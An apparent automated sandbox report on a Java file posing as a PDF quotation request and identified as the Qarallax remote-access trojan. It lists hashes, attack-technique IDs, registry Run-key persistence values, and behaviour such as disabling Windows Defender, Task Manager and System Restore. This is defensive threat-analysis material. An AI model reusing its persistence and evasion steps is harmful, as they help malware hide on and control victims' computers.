qarallax | 317635d2a76079e6d1b3ac14352d5d79d221d024dce158dfbf319287f34eef67

Analysis

max time kernel
111s
max time network
144s
platform
windows10_x64
resource
win10
submitted
19-08-2020 07:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Techno Group Pakistan Request For Quotation_pdf.jar
Size

411KB
MD5

ecd47ff15da71165a3462b367ec4d4b1
SHA1

43e309930fd7357c9f9e49fb84cae72f62f9c618
SHA256

317635d2a76079e6d1b3ac14352d5d79d221d024dce158dfbf319287f34eef67
SHA512

bb78d871eb67c6190771eeb9862c0f87d8a47924aa6bd4cca86c4d28ad1c0615117e7a8dbf944bf0fbc3db35d43b93af5917d335822f318bddcdcd3078e93287

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae57-58.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3780	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\ayTDT	java.exe
File opened for modification	C:\Windows\System32\ayTDT	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
3864	taskkill.exe
4268	taskkill.exe
4640	taskkill.exe
4932	taskkill.exe
1308	taskkill.exe
4864	taskkill.exe
2620	taskkill.exe
4880	taskkill.exe
3516	taskkill.exe
4488	taskkill.exe
4892	taskkill.exe
4860	taskkill.exe
4972	taskkill.exe
4312	taskkill.exe
4372	taskkill.exe
3524	taskkill.exe
3356	taskkill.exe
4596	taskkill.exe
3140	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
412	powershell.exe
412	powershell.exe
412	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3780	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3788	WMIC.exe
Token: SeSecurityPrivilege	3788	WMIC.exe
Token: SeTakeOwnershipPrivilege	3788	WMIC.exe
Token: SeLoadDriverPrivilege	3788	WMIC.exe
Token: SeSystemProfilePrivilege	3788	WMIC.exe
Token: SeSystemtimePrivilege	3788	WMIC.exe
Token: SeProfSingleProcessPrivilege	3788	WMIC.exe
Token: SeIncBasePriorityPrivilege	3788	WMIC.exe
Token: SeCreatePagefilePrivilege	3788	WMIC.exe
Token: SeBackupPrivilege	3788	WMIC.exe
Token: SeRestorePrivilege	3788	WMIC.exe
Token: SeShutdownPrivilege	3788	WMIC.exe
Token: SeDebugPrivilege	3788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3788	WMIC.exe
Token: SeRemoteShutdownPrivilege	3788	WMIC.exe
Token: SeUndockPrivilege	3788	WMIC.exe
Token: SeManageVolumePrivilege	3788	WMIC.exe
Token: 33	3788	WMIC.exe
Token: 34	3788	WMIC.exe
Token: 35	3788	WMIC.exe
Token: 36	3788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3788	WMIC.exe
Token: SeSecurityPrivilege	3788	WMIC.exe
Token: SeTakeOwnershipPrivilege	3788	WMIC.exe
Token: SeLoadDriverPrivilege	3788	WMIC.exe
Token: SeSystemProfilePrivilege	3788	WMIC.exe
Token: SeSystemtimePrivilege	3788	WMIC.exe
Token: SeProfSingleProcessPrivilege	3788	WMIC.exe
Token: SeIncBasePriorityPrivilege	3788	WMIC.exe
Token: SeCreatePagefilePrivilege	3788	WMIC.exe
Token: SeBackupPrivilege	3788	WMIC.exe
Token: SeRestorePrivilege	3788	WMIC.exe
Token: SeShutdownPrivilege	3788	WMIC.exe
Token: SeDebugPrivilege	3788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3788	WMIC.exe
Token: SeRemoteShutdownPrivilege	3788	WMIC.exe
Token: SeUndockPrivilege	3788	WMIC.exe
Token: SeManageVolumePrivilege	3788	WMIC.exe
Token: 33	3788	WMIC.exe
Token: 34	3788	WMIC.exe
Token: 35	3788	WMIC.exe
Token: 36	3788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	640	WMIC.exe
Token: SeSecurityPrivilege	640	WMIC.exe
Token: SeTakeOwnershipPrivilege	640	WMIC.exe
Token: SeLoadDriverPrivilege	640	WMIC.exe
Token: SeSystemProfilePrivilege	640	WMIC.exe
Token: SeSystemtimePrivilege	640	WMIC.exe
Token: SeProfSingleProcessPrivilege	640	WMIC.exe
Token: SeIncBasePriorityPrivilege	640	WMIC.exe
Token: SeCreatePagefilePrivilege	640	WMIC.exe
Token: SeBackupPrivilege	640	WMIC.exe
Token: SeRestorePrivilege	640	WMIC.exe
Token: SeShutdownPrivilege	640	WMIC.exe
Token: SeDebugPrivilege	640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	640	WMIC.exe
Token: SeRemoteShutdownPrivilege	640	WMIC.exe
Token: SeUndockPrivilege	640	WMIC.exe
Token: SeManageVolumePrivilege	640	WMIC.exe
Token: 33	640	WMIC.exe
Token: 34	640	WMIC.exe
Token: 35	640	WMIC.exe
Token: 36	640	WMIC.exe
Token: SeIncreaseQuotaPrivilege	640	WMIC.exe
Token: SeSecurityPrivilege	640	WMIC.exe
Token: SeTakeOwnershipPrivilege	640	WMIC.exe
Token: SeLoadDriverPrivilege	640	WMIC.exe
Token: SeSystemProfilePrivilege	640	WMIC.exe
Token: SeSystemtimePrivilege	640	WMIC.exe
Token: SeProfSingleProcessPrivilege	640	WMIC.exe
Token: SeIncBasePriorityPrivilege	640	WMIC.exe
Token: SeCreatePagefilePrivilege	640	WMIC.exe
Token: SeBackupPrivilege	640	WMIC.exe
Token: SeRestorePrivilege	640	WMIC.exe
Token: SeShutdownPrivilege	640	WMIC.exe
Token: SeDebugPrivilege	640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	640	WMIC.exe
Token: SeRemoteShutdownPrivilege	640	WMIC.exe
Token: SeUndockPrivilege	640	WMIC.exe
Token: SeManageVolumePrivilege	640	WMIC.exe
Token: 33	640	WMIC.exe
Token: 34	640	WMIC.exe
Token: 35	640	WMIC.exe
Token: 36	640	WMIC.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeIncreaseQuotaPrivilege	412	powershell.exe
Token: SeSecurityPrivilege	412	powershell.exe
Token: SeTakeOwnershipPrivilege	412	powershell.exe
Token: SeLoadDriverPrivilege	412	powershell.exe
Token: SeSystemProfilePrivilege	412	powershell.exe
Token: SeSystemtimePrivilege	412	powershell.exe
Token: SeProfSingleProcessPrivilege	412	powershell.exe
Token: SeIncBasePriorityPrivilege	412	powershell.exe
Token: SeCreatePagefilePrivilege	412	powershell.exe
Token: SeBackupPrivilege	412	powershell.exe
Token: SeRestorePrivilege	412	powershell.exe
Token: SeShutdownPrivilege	412	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeSystemEnvironmentPrivilege	412	powershell.exe
Token: SeRemoteShutdownPrivilege	412	powershell.exe
Token: SeUndockPrivilege	412	powershell.exe
Token: SeManageVolumePrivilege	412	powershell.exe
Token: 33	412	powershell.exe
Token: 34	412	powershell.exe
Token: 35	412	powershell.exe
Token: 36	412	powershell.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2768	WMIC.exe
Token: SeSecurityPrivilege	2768	WMIC.exe
Token: SeTakeOwnershipPrivilege	2768	WMIC.exe
Token: SeLoadDriverPrivilege	2768	WMIC.exe
Token: SeSystemProfilePrivilege	2768	WMIC.exe
Token: SeSystemtimePrivilege	2768	WMIC.exe
Token: SeProfSingleProcessPrivilege	2768	WMIC.exe
Token: SeIncBasePriorityPrivilege	2768	WMIC.exe
Token: SeCreatePagefilePrivilege	2768	WMIC.exe
Token: SeBackupPrivilege	2768	WMIC.exe
Token: SeRestorePrivilege	2768	WMIC.exe
Token: SeShutdownPrivilege	2768	WMIC.exe
Token: SeDebugPrivilege	2768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2768	WMIC.exe
Token: SeRemoteShutdownPrivilege	2768	WMIC.exe
Token: SeUndockPrivilege	2768	WMIC.exe
Token: SeManageVolumePrivilege	2768	WMIC.exe
Token: 33	2768	WMIC.exe
Token: 34	2768	WMIC.exe
Token: 35	2768	WMIC.exe
Token: 36	2768	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2768	WMIC.exe
Token: SeSecurityPrivilege	2768	WMIC.exe
Token: SeTakeOwnershipPrivilege	2768	WMIC.exe
Token: SeLoadDriverPrivilege	2768	WMIC.exe
Token: SeSystemProfilePrivilege	2768	WMIC.exe
Token: SeSystemtimePrivilege	2768	WMIC.exe
Token: SeProfSingleProcessPrivilege	2768	WMIC.exe
Token: SeIncBasePriorityPrivilege	2768	WMIC.exe
Token: SeCreatePagefilePrivilege	2768	WMIC.exe
Token: SeBackupPrivilege	2768	WMIC.exe
Token: SeRestorePrivilege	2768	WMIC.exe
Token: SeShutdownPrivilege	2768	WMIC.exe
Token: SeDebugPrivilege	2768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2768	WMIC.exe
Token: SeRemoteShutdownPrivilege	2768	WMIC.exe
Token: SeUndockPrivilege	2768	WMIC.exe
Token: SeManageVolumePrivilege	2768	WMIC.exe
Token: 33	2768	WMIC.exe
Token: 34	2768	WMIC.exe
Token: 35	2768	WMIC.exe
Token: 36	2768	WMIC.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	4880	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	4864	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	4932	taskkill.exe
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	4596	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3780	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

description	pid	Process	procid_target
PID 3780 wrote to memory of 1544	3780	java.exe	68
PID 3780 wrote to memory of 1544	3780	java.exe	68
PID 3780 wrote to memory of 2552	3780	java.exe	70
PID 3780 wrote to memory of 2552	3780	java.exe	70
PID 2552 wrote to memory of 3788	2552	cmd.exe	72
PID 2552 wrote to memory of 3788	2552	cmd.exe	72
PID 3780 wrote to memory of 416	3780	java.exe	73
PID 3780 wrote to memory of 416	3780	java.exe	73
PID 416 wrote to memory of 640	416	cmd.exe	75
PID 416 wrote to memory of 640	416	cmd.exe	75
PID 3780 wrote to memory of 804	3780	java.exe	76
PID 3780 wrote to memory of 804	3780	java.exe	76
PID 3780 wrote to memory of 3844	3780	java.exe	78
PID 3780 wrote to memory of 3844	3780	java.exe	78
PID 3780 wrote to memory of 1152	3780	java.exe	80
PID 3780 wrote to memory of 1152	3780	java.exe	80
PID 3780 wrote to memory of 1212	3780	java.exe	81
PID 3780 wrote to memory of 1212	3780	java.exe	81
PID 3780 wrote to memory of 1284	3780	java.exe	83
PID 3780 wrote to memory of 1284	3780	java.exe	83
PID 3780 wrote to memory of 1420	3780	java.exe	85
PID 3780 wrote to memory of 1420	3780	java.exe	85
PID 3780 wrote to memory of 1540	3780	java.exe	87
PID 3780 wrote to memory of 1540	3780	java.exe	87
PID 3780 wrote to memory of 1740	3780	java.exe	89
PID 3780 wrote to memory of 1740	3780	java.exe	89
PID 3780 wrote to memory of 2724	3780	java.exe	92
PID 3780 wrote to memory of 2724	3780	java.exe	92
PID 3780 wrote to memory of 412	3780	java.exe	94
PID 3780 wrote to memory of 412	3780	java.exe	94
PID 3780 wrote to memory of 3524	3780	java.exe	95
PID 3780 wrote to memory of 3524	3780	java.exe	95
PID 3780 wrote to memory of 3140	3780	java.exe	96
PID 3780 wrote to memory of 3140	3780	java.exe	96
PID 3780 wrote to memory of 2660	3780	java.exe	97
PID 3780 wrote to memory of 2660	3780	java.exe	97
PID 3780 wrote to memory of 3612	3780	java.exe	102
PID 3780 wrote to memory of 3612	3780	java.exe	102
PID 3780 wrote to memory of 3228	3780	java.exe	103
PID 3780 wrote to memory of 3228	3780	java.exe	103
PID 3780 wrote to memory of 3964	3780	java.exe	106
PID 3780 wrote to memory of 3964	3780	java.exe	106
PID 3780 wrote to memory of 3908	3780	java.exe	107
PID 3780 wrote to memory of 3908	3780	java.exe	107
PID 3780 wrote to memory of 1252	3780	java.exe	110
PID 3780 wrote to memory of 1252	3780	java.exe	110
PID 3780 wrote to memory of 1288	3780	java.exe	111
PID 3780 wrote to memory of 1288	3780	java.exe	111
PID 3780 wrote to memory of 1312	3780	java.exe	114
PID 3780 wrote to memory of 1312	3780	java.exe	114
PID 3780 wrote to memory of 3680	3780	java.exe	115
PID 3780 wrote to memory of 3680	3780	java.exe	115
PID 3780 wrote to memory of 2532	3780	java.exe	118
PID 3780 wrote to memory of 2532	3780	java.exe	118
PID 3780 wrote to memory of 3664	3780	java.exe	119
PID 3780 wrote to memory of 3664	3780	java.exe	119
PID 3780 wrote to memory of 1308	3780	java.exe	121
PID 3780 wrote to memory of 1308	3780	java.exe	121
PID 3780 wrote to memory of 2052	3780	java.exe	123
PID 3780 wrote to memory of 2052	3780	java.exe	123
PID 3780 wrote to memory of 804	3780	java.exe	124
PID 3780 wrote to memory of 804	3780	java.exe	124
PID 2724 wrote to memory of 2488	2724	cmd.exe	128
PID 2724 wrote to memory of 2488	2724	cmd.exe	128
PID 3780 wrote to memory of 740	3780	java.exe	129
PID 3780 wrote to memory of 740	3780	java.exe	129
PID 3780 wrote to memory of 3852	3780	java.exe	130
PID 3780 wrote to memory of 3852	3780	java.exe	130
PID 3780 wrote to memory of 2480	3780	java.exe	134
PID 3780 wrote to memory of 2480	3780	java.exe	134
PID 3780 wrote to memory of 1768	3780	java.exe	135
PID 3780 wrote to memory of 1768	3780	java.exe	135
PID 3780 wrote to memory of 2084	3780	java.exe	138
PID 3780 wrote to memory of 2084	3780	java.exe	138
PID 3780 wrote to memory of 2720	3780	java.exe	139
PID 3780 wrote to memory of 2720	3780	java.exe	139
PID 3780 wrote to memory of 648	3780	java.exe	142
PID 3780 wrote to memory of 648	3780	java.exe	142
PID 3780 wrote to memory of 1312	3780	java.exe	143
PID 3780 wrote to memory of 1312	3780	java.exe	143
PID 3780 wrote to memory of 1744	3780	java.exe	146
PID 3780 wrote to memory of 1744	3780	java.exe	146
PID 3780 wrote to memory of 384	3780	java.exe	147
PID 3780 wrote to memory of 384	3780	java.exe	147
PID 3780 wrote to memory of 3524	3780	java.exe	150
PID 3780 wrote to memory of 3524	3780	java.exe	150
PID 3780 wrote to memory of 2052	3780	java.exe	151
PID 3780 wrote to memory of 2052	3780	java.exe	151
PID 3780 wrote to memory of 3640	3780	java.exe	152
PID 3780 wrote to memory of 3640	3780	java.exe	152
PID 3780 wrote to memory of 2552	3780	java.exe	156
PID 3780 wrote to memory of 2552	3780	java.exe	156
PID 3780 wrote to memory of 2396	3780	java.exe	158
PID 3780 wrote to memory of 2396	3780	java.exe	158
PID 2724 wrote to memory of 632	2724	cmd.exe	159
PID 2724 wrote to memory of 632	2724	cmd.exe	159
PID 3780 wrote to memory of 2720	3780	java.exe	161
PID 3780 wrote to memory of 2720	3780	java.exe	161
PID 3780 wrote to memory of 1772	3780	java.exe	163
PID 3780 wrote to memory of 1772	3780	java.exe	163
PID 3780 wrote to memory of 2452	3780	java.exe	165
PID 3780 wrote to memory of 2452	3780	java.exe	165
PID 3780 wrote to memory of 3488	3780	java.exe	167
PID 3780 wrote to memory of 3488	3780	java.exe	167
PID 3780 wrote to memory of 1984	3780	java.exe	169
PID 3780 wrote to memory of 1984	3780	java.exe	169
PID 1984 wrote to memory of 3840	1984	cmd.exe	171
PID 1984 wrote to memory of 3840	1984	cmd.exe	171
PID 1984 wrote to memory of 1552	1984	cmd.exe	172
PID 1984 wrote to memory of 1552	1984	cmd.exe	172
PID 3780 wrote to memory of 1288	3780	java.exe	173
PID 3780 wrote to memory of 1288	3780	java.exe	173
PID 1288 wrote to memory of 1448	1288	cmd.exe	175
PID 1288 wrote to memory of 1448	1288	cmd.exe	175
PID 1288 wrote to memory of 2116	1288	cmd.exe	176
PID 1288 wrote to memory of 2116	1288	cmd.exe	176
PID 3780 wrote to memory of 1112	3780	java.exe	177
PID 3780 wrote to memory of 1112	3780	java.exe	177
PID 1112 wrote to memory of 2552	1112	cmd.exe	179
PID 1112 wrote to memory of 2552	1112	cmd.exe	179
PID 3780 wrote to memory of 3356	3780	java.exe	180
PID 3780 wrote to memory of 3356	3780	java.exe	180
PID 1112 wrote to memory of 3228	1112	cmd.exe	182
PID 1112 wrote to memory of 3228	1112	cmd.exe	182
PID 3780 wrote to memory of 1460	3780	java.exe	183
PID 3780 wrote to memory of 1460	3780	java.exe	183
PID 1460 wrote to memory of 1056	1460	cmd.exe	185
PID 1460 wrote to memory of 1056	1460	cmd.exe	185
PID 1460 wrote to memory of 1240	1460	cmd.exe	186
PID 1460 wrote to memory of 1240	1460	cmd.exe	186
PID 3780 wrote to memory of 1744	3780	java.exe	187
PID 3780 wrote to memory of 1744	3780	java.exe	187
PID 1744 wrote to memory of 3700	1744	cmd.exe	189
PID 1744 wrote to memory of 3700	1744	cmd.exe	189
PID 1744 wrote to memory of 424	1744	cmd.exe	190
PID 1744 wrote to memory of 424	1744	cmd.exe	190
PID 3780 wrote to memory of 2380	3780	java.exe	192
PID 3780 wrote to memory of 2380	3780	java.exe	192
PID 2380 wrote to memory of 3844	2380	cmd.exe	194
PID 2380 wrote to memory of 3844	2380	cmd.exe	194
PID 2380 wrote to memory of 508	2380	cmd.exe	195
PID 2380 wrote to memory of 508	2380	cmd.exe	195
PID 3780 wrote to memory of 3860	3780	java.exe	196
PID 3780 wrote to memory of 3860	3780	java.exe	196
PID 3860 wrote to memory of 3884	3860	cmd.exe	198
PID 3860 wrote to memory of 3884	3860	cmd.exe	198
PID 3860 wrote to memory of 2552	3860	cmd.exe	199
PID 3860 wrote to memory of 2552	3860	cmd.exe	199
PID 3780 wrote to memory of 1312	3780	java.exe	200
PID 3780 wrote to memory of 1312	3780	java.exe	200
PID 1312 wrote to memory of 3228	1312	cmd.exe	202
PID 1312 wrote to memory of 3228	1312	cmd.exe	202
PID 3780 wrote to memory of 3516	3780	java.exe	203
PID 3780 wrote to memory of 3516	3780	java.exe	203
PID 1312 wrote to memory of 740	1312	cmd.exe	204
PID 1312 wrote to memory of 740	1312	cmd.exe	204
PID 3780 wrote to memory of 1680	3780	java.exe	206
PID 3780 wrote to memory of 1680	3780	java.exe	206
PID 1680 wrote to memory of 508	1680	cmd.exe	208
PID 1680 wrote to memory of 508	1680	cmd.exe	208
PID 1680 wrote to memory of 3728	1680	cmd.exe	209
PID 1680 wrote to memory of 3728	1680	cmd.exe	209
PID 3780 wrote to memory of 3848	3780	java.exe	210
PID 3780 wrote to memory of 3848	3780	java.exe	210
PID 3848 wrote to memory of 2444	3848	cmd.exe	212
PID 3848 wrote to memory of 2444	3848	cmd.exe	212
PID 3848 wrote to memory of 848	3848	cmd.exe	213
PID 3848 wrote to memory of 848	3848	cmd.exe	213
PID 3780 wrote to memory of 1544	3780	java.exe	214
PID 3780 wrote to memory of 1544	3780	java.exe	214
PID 3780 wrote to memory of 1104	3780	java.exe	216
PID 3780 wrote to memory of 1104	3780	java.exe	216
PID 1544 wrote to memory of 3008	1544	cmd.exe	218
PID 1544 wrote to memory of 3008	1544	cmd.exe	218
PID 1544 wrote to memory of 1148	1544	cmd.exe	219
PID 1544 wrote to memory of 1148	1544	cmd.exe	219
PID 1104 wrote to memory of 2768	1104	cmd.exe	220
PID 1104 wrote to memory of 2768	1104	cmd.exe	220
PID 3780 wrote to memory of 2564	3780	java.exe	221
PID 3780 wrote to memory of 2564	3780	java.exe	221
PID 2564 wrote to memory of 3864	2564	cmd.exe	223
PID 2564 wrote to memory of 3864	2564	cmd.exe	223
PID 2564 wrote to memory of 1536	2564	cmd.exe	224
PID 2564 wrote to memory of 1536	2564	cmd.exe	224
PID 3780 wrote to memory of 2120	3780	java.exe	225
PID 3780 wrote to memory of 2120	3780	java.exe	225
PID 2120 wrote to memory of 1212	2120	cmd.exe	227
PID 2120 wrote to memory of 1212	2120	cmd.exe	227
PID 2120 wrote to memory of 3700	2120	cmd.exe	228
PID 2120 wrote to memory of 3700	2120	cmd.exe	228
PID 3780 wrote to memory of 3008	3780	java.exe	229
PID 3780 wrote to memory of 3008	3780	java.exe	229
PID 3008 wrote to memory of 3884	3008	cmd.exe	231
PID 3008 wrote to memory of 3884	3008	cmd.exe	231
PID 3008 wrote to memory of 752	3008	cmd.exe	232
PID 3008 wrote to memory of 752	3008	cmd.exe	232
PID 3780 wrote to memory of 1212	3780	java.exe	233
PID 3780 wrote to memory of 1212	3780	java.exe	233
PID 3780 wrote to memory of 3864	3780	java.exe	235
PID 3780 wrote to memory of 3864	3780	java.exe	235
PID 1212 wrote to memory of 3700	1212	cmd.exe	237
PID 1212 wrote to memory of 3700	1212	cmd.exe	237
PID 1212 wrote to memory of 4124	1212	cmd.exe	238
PID 1212 wrote to memory of 4124	1212	cmd.exe	238
PID 3780 wrote to memory of 4152	3780	java.exe	239
PID 3780 wrote to memory of 4152	3780	java.exe	239
PID 4152 wrote to memory of 4188	4152	cmd.exe	241
PID 4152 wrote to memory of 4188	4152	cmd.exe	241
PID 4152 wrote to memory of 4212	4152	cmd.exe	242
PID 4152 wrote to memory of 4212	4152	cmd.exe	242
PID 3780 wrote to memory of 4232	3780	java.exe	243
PID 3780 wrote to memory of 4232	3780	java.exe	243
PID 4232 wrote to memory of 4268	4232	cmd.exe	245
PID 4232 wrote to memory of 4268	4232	cmd.exe	245
PID 4232 wrote to memory of 4288	4232	cmd.exe	246
PID 4232 wrote to memory of 4288	4232	cmd.exe	246
PID 3780 wrote to memory of 4304	3780	java.exe	247
PID 3780 wrote to memory of 4304	3780	java.exe	247
PID 4304 wrote to memory of 4344	4304	cmd.exe	249
PID 4304 wrote to memory of 4344	4304	cmd.exe	249
PID 4304 wrote to memory of 4364	4304	cmd.exe	250
PID 4304 wrote to memory of 4364	4304	cmd.exe	250
PID 3780 wrote to memory of 4384	3780	java.exe	251
PID 3780 wrote to memory of 4384	3780	java.exe	251
PID 4384 wrote to memory of 4420	4384	cmd.exe	253
PID 4384 wrote to memory of 4420	4384	cmd.exe	253
PID 4384 wrote to memory of 4440	4384	cmd.exe	254
PID 4384 wrote to memory of 4440	4384	cmd.exe	254
PID 3780 wrote to memory of 4464	3780	java.exe	255
PID 3780 wrote to memory of 4464	3780	java.exe	255
PID 3780 wrote to memory of 4488	3780	java.exe	257
PID 3780 wrote to memory of 4488	3780	java.exe	257
PID 4464 wrote to memory of 4528	4464	cmd.exe	259
PID 4464 wrote to memory of 4528	4464	cmd.exe	259
PID 4464 wrote to memory of 4560	4464	cmd.exe	260
PID 4464 wrote to memory of 4560	4464	cmd.exe	260
PID 3780 wrote to memory of 4584	3780	java.exe	261
PID 3780 wrote to memory of 4584	3780	java.exe	261
PID 4584 wrote to memory of 4636	4584	cmd.exe	263
PID 4584 wrote to memory of 4636	4584	cmd.exe	263
PID 4584 wrote to memory of 4656	4584	cmd.exe	264
PID 4584 wrote to memory of 4656	4584	cmd.exe	264
PID 3780 wrote to memory of 4676	3780	java.exe	265
PID 3780 wrote to memory of 4676	3780	java.exe	265
PID 4676 wrote to memory of 4712	4676	cmd.exe	267
PID 4676 wrote to memory of 4712	4676	cmd.exe	267
PID 4676 wrote to memory of 4732	4676	cmd.exe	268
PID 4676 wrote to memory of 4732	4676	cmd.exe	268
PID 3780 wrote to memory of 4748	3780	java.exe	269
PID 3780 wrote to memory of 4748	3780	java.exe	269
PID 4748 wrote to memory of 4784	4748	cmd.exe	271
PID 4748 wrote to memory of 4784	4748	cmd.exe	271
PID 4748 wrote to memory of 4804	4748	cmd.exe	272
PID 4748 wrote to memory of 4804	4748	cmd.exe	272
PID 3780 wrote to memory of 4824	3780	java.exe	273
PID 3780 wrote to memory of 4824	3780	java.exe	273
PID 4824 wrote to memory of 4860	4824	cmd.exe	275
PID 4824 wrote to memory of 4860	4824	cmd.exe	275
PID 4824 wrote to memory of 4880	4824	cmd.exe	276
PID 4824 wrote to memory of 4880	4824	cmd.exe	276
PID 3780 wrote to memory of 4892	3780	java.exe	277
PID 3780 wrote to memory of 4892	3780	java.exe	277
PID 3780 wrote to memory of 4916	3780	java.exe	279
PID 3780 wrote to memory of 4916	3780	java.exe	279
PID 4916 wrote to memory of 4976	4916	cmd.exe	281
PID 4916 wrote to memory of 4976	4916	cmd.exe	281
PID 4916 wrote to memory of 5012	4916	cmd.exe	282
PID 4916 wrote to memory of 5012	4916	cmd.exe	282
PID 3780 wrote to memory of 5032	3780	java.exe	283
PID 3780 wrote to memory of 5032	3780	java.exe	283
PID 5032 wrote to memory of 5068	5032	cmd.exe	285
PID 5032 wrote to memory of 5068	5032	cmd.exe	285
PID 5032 wrote to memory of 5088	5032	cmd.exe	286
PID 5032 wrote to memory of 5088	5032	cmd.exe	286
PID 3780 wrote to memory of 5104	3780	java.exe	287
PID 3780 wrote to memory of 5104	3780	java.exe	287
PID 5104 wrote to memory of 4128	5104	cmd.exe	289
PID 5104 wrote to memory of 4128	5104	cmd.exe	289
PID 5104 wrote to memory of 4160	5104	cmd.exe	290
PID 5104 wrote to memory of 4160	5104	cmd.exe	290
PID 3780 wrote to memory of 4136	3780	java.exe	291
PID 3780 wrote to memory of 4136	3780	java.exe	291
PID 4136 wrote to memory of 2444	4136	cmd.exe	293
PID 4136 wrote to memory of 2444	4136	cmd.exe	293
PID 4136 wrote to memory of 4188	4136	cmd.exe	294
PID 4136 wrote to memory of 4188	4136	cmd.exe	294
PID 3780 wrote to memory of 4248	3780	java.exe	295
PID 3780 wrote to memory of 4248	3780	java.exe	295
PID 3780 wrote to memory of 4268	3780	java.exe	297
PID 3780 wrote to memory of 4268	3780	java.exe	297
PID 4248 wrote to memory of 4288	4248	cmd.exe	298
PID 4248 wrote to memory of 4288	4248	cmd.exe	298
PID 4248 wrote to memory of 4372	4248	cmd.exe	300
PID 4248 wrote to memory of 4372	4248	cmd.exe	300
PID 3780 wrote to memory of 3352	3780	java.exe	301
PID 3780 wrote to memory of 3352	3780	java.exe	301
PID 3352 wrote to memory of 1532	3352	cmd.exe	303
PID 3352 wrote to memory of 1532	3352	cmd.exe	303
PID 3352 wrote to memory of 4448	3352	cmd.exe	304
PID 3352 wrote to memory of 4448	3352	cmd.exe	304
PID 3780 wrote to memory of 4440	3780	java.exe	305
PID 3780 wrote to memory of 4440	3780	java.exe	305
PID 4440 wrote to memory of 4552	4440	cmd.exe	307
PID 4440 wrote to memory of 4552	4440	cmd.exe	307
PID 4440 wrote to memory of 4596	4440	cmd.exe	308
PID 4440 wrote to memory of 4596	4440	cmd.exe	308
PID 3780 wrote to memory of 4652	3780	java.exe	309
PID 3780 wrote to memory of 4652	3780	java.exe	309
PID 4652 wrote to memory of 4492	4652	cmd.exe	311
PID 4652 wrote to memory of 4492	4652	cmd.exe	311
PID 4652 wrote to memory of 4656	4652	cmd.exe	312
PID 4652 wrote to memory of 4656	4652	cmd.exe	312
PID 3780 wrote to memory of 4516	3780	java.exe	313
PID 3780 wrote to memory of 4516	3780	java.exe	313
PID 4516 wrote to memory of 4736	4516	cmd.exe	315
PID 4516 wrote to memory of 4736	4516	cmd.exe	315
PID 4516 wrote to memory of 4764	4516	cmd.exe	316
PID 4516 wrote to memory of 4764	4516	cmd.exe	316
PID 3780 wrote to memory of 4812	3780	java.exe	317
